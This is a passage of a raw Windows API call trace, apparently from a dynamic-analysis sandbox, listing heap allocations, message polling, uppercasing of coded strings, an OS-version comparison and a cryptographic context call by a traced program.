(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0187.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.691] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0187.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0187.692] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0187.692] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0187.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0187.693] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0187.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0187.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0187.693] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0187.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0187.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0187.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.694] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0187.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0187.695] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0187.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0187.695] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0187.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0187.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0187.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.698] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.699] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0187.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.704] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.704] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.704] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.704] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.704] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0187.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.706] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.706] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.706] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.707] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0187.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0187.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0187.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0187.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0187.707] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0187.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0187.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0187.707] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.707] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0187.708] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.708] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0187.708] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0187.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0187.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0187.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0187.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.709] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab26f0) returned 1 [0187.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0187.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0187.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0187.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0187.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0187.711] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.712] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0187.712] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0187.712] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0187.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.713] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0187.713] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.713] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0187.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0187.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0187.713] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.713] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.713] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.714] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0187.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0187.714] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0187.714] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 